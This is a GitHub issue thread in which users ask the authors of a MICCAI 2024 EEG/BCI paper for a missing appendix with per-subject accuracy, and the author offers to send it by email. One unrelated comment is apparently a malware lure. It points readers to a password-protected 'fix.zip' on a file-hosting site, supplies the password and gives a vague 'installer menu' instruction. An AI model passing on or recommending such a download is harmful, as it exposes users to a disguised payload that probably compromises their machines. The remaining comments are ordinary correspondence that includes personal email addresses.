### ISSUE TITLE
Can you share the accuracy for each subject?

### ISSUE THREAD

**Issue by Fulin-Wei** [SionAn/MICCAI2024-ResTL#2]
"In Appendix, we report the classification accuracy for each subject on BCI IV-2a and BCI IV-2b." But I can't get the Appendix. Can you share the accuracy for each subject? Thank you!

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SionAn** [comment]
I apologize for the late response. 
Could you please let me know your email address? 
Then, I will send you the appendix.

**Comment by duolaiamen** [comment]
> 抱歉回复迟了。 请告诉我您的电子邮件地址。 然后我会把附录发给您。

hi，my email：1310899535@qq.com
I would also like to get the appendix mentioned in your paper

**Comment by Fulin-Wei** [comment]
> I apologize for the late response. Could you please let me know your email address? Then, I will send you the appendix.

hi, my email：weifulin@mail.bnu.edu.cn.  Thank you!
